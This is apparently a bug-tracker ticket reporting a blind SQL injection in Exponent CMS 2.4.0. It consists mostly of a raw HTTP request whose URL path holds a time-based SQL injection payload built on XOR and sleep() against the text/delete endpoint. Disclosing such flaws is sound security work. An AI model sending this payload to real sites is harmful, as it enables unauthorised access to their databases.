#1393 new

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (3)

Reported by Nicky | November 6th, 2016 @ 07:45 AM

GET /exponent/text/delete/id/if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*//src/@footer HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=e965beb8dc3e7046008f7d832de5b554; adminer_key=cdeaea5d52a8f402a28bd04980a7851b
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /

Comments and changes to this ticket

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

New-ticket Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile »

Bug Tracker for Exponent CMS

Shared Ticket Bins

People watching this ticket